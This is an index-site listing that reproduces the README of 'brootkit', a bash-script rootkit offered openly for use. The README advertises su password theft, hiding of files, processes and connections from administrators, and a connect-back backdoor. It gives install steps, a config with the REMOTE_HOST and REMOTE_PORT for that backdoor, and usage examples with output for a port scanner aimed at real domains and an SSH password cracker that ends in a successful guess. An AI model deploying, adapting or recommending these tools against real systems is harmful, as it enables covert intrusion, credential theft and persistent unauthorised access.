Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/cloudsec/brootkit
Lightweight rootkit implemented by bash shell scripts v0.10
https://github.com/cloudsec/brootkit
Last synced: 26 days ago
JSON representation
Lightweight rootkit implemented by bash shell scripts v0.10
- Host: GitHub
- URL: https://github.com/cloudsec/brootkit
- Owner: cloudsec
- Created: 2015-01-08T00:01:54.000Z (almost 10 years ago)
- Default Branch: master
- Last Pushed: 2017-09-12T04:32:57.000Z (about 7 years ago)
- Last Synced: 2024-02-11T18:47:27.907Z (10 months ago)
- Language: Shell
- Homepage:
- Size: 48.8 KB
- Stars: 576
- Watchers: 59
- Forks: 236
- Open Issues: 4
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - cloudsec/brootkit - Lightweight rootkit implemented by bash shell scripts v0.10 (Shell)
README
######BROOTKIT
Lightweight rootkit implemented using bash shell scripts v0.10
by wzt 2015 [email protected]
If bash shell scripts can be designed for security tools like chkrootkit
or rkhunter, so too can it be implemented for a rootkit.######FEATURES
1. more hidable ability against admintrator or hids.
2. su passwd thief.
3. hide file and directories.
4. hide process.
5. hide network connections.
6. connect backdoor.
7. multi thread port scanner.
8. http download.
9. multi thread ssh passwd crack.######TARGET OS
1. centos
2. rhel
3. ubuntu
4. debian
5. fedora
6. freebsd######TODO
1. sudo thief support.######INSTALL
Linux distribution systems.
1. edit br.conf first
brootkit config file.
#these ports will be hidden: port1,port2,...,portn.
HIDE_PORT 8080,8899
#these files will be hidden: file1,file2,...,filen.
HIDE_FILE br.conf,bashbd.sh,brootkit,.bdrc,brdaemon
#these processes will be hidden: process1,process2,...,processn.
HIDE_PROC bashbd,brootkit,pty.spawn,brdaemon
#the connect back host domain name or ip address.
REMOTE_HOST localhost
#the connect back host port.
REMOTE_PORT 8080
#the connect backdoor base sleep time.
SLEEP_TIME 602. ./install.sh
3. multi thread port scanner.
[root@localhost brootkit]$ ./brscan.sh
./brscan.sh <-p> [-n|-t|-o|-h]option:
-p ports, pattern: port1,port2,port3-port7,portn...
-n thread num, default is 10
-t timeout, default is 30s
-o results write into log file, default is brscan.log
-h help information.exp:
./brscan.sh -p 21,22,23-25,80,135-139,8080 -t 20 www.cloud-sec.org
./brscan.sh -p 1-65525 -n 200 -t 20 www.cloud-sec.org[root@localhost brootkit]# ./brscan.sh -p 21,22,23-25,80,135-139,8080 -t 5 -n 20 www.wooyun.org
host: www.wooyun.org | total ports: 10 | thread num: 10 timeout: 5 | logfile: brscan.logthread<0 > -- pid <57053> --> 21
thread<1 > -- pid <57054> --> 22
thread<2 > -- pid <57055> --> 23
thread<3 > -- pid <57056> --> 24
thread<4 > -- pid <57057> --> 80
thread<5 > -- pid <57058> --> 135
thread<6 > -- pid <57059> --> 136
thread<7 > -- pid <57060> --> 137
thread<8 > -- pid <57061> --> 138
thread<9 > -- pid <57070> --> 8080[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>] 10/10 6 s
www.wooyun.org: 80
4. multi thread ssh passwd crack.
[root@localhost brootkit]# ./sshcrack.sh
./sshcrack.sh <-h host> <-u user> <-p passwd> [-t timeout] [-n threadnum] [-o logfile]option:
-h host name or host list file.
-u user name or user list file.
-p single passwd or passwd list file.
-t connect timeout, defalut is 5s.
-n thread num, default is 1.
-o log file.
-v display help information.exp:
./sshcrack.sh -h 192.168.215.148 -u wzt -p passwd.lst
./sshcrack.sh -h 192.168.215.148 -u wzt -p passwd.lst -n 10 -t 2
./sshcrack.sh -h 192.168.215.148 -u user.lst -p passwd.lst -n 10 -t 2
./sshcrack.sh -h host.lst -u user.lst -p passwd.lst -n 10 -t 2[root@localhost brootkit]# ./sshcrack.sh -h 192.168.215.148 -u wzt -p passwd.lst -n 6
host: 1 | users: 1 | passwd: 28 thread: 6 | timeout: 10 | logfile: sshcrack.logThread[ 1] [email protected] ==> [e ] [failed] 3
Thread[ 2] [email protected] ==> [a ] [failed] 3
Thread[ 3] [email protected] ==> [d ] [failed] 3
Thread[ 4] [email protected] ==> [123456789 ] [success] 6
Thread[ 5] [email protected] ==> [123456 ] [failed] 3
Thread[ 6] [email protected] ==> [fd ] [failed] 3waiting all threads to finsh...
Freebsd system
on the modern freebsd system root use csh by default, the other users
use sh default. this version of brootkit can only support sh based features.1. edit brsh.conf first
brshootkit config file, only one argument support.
#this port will be hidden.
HIDE_PORT 8080
#these files will be hidden.
HIDE_FILE brsh
#these process will be hidden.
HIDE_PROC sh
#the connect back host domain name or ip address.
REMOTE_HOST localhost
#the connect back host port.
REMOTE_PORT 8080
#the connect backdoor base sleep time.
SLEEP_TIME 602. ./install.sh
######SOURCE
https://github.com/cloudsec/brootkit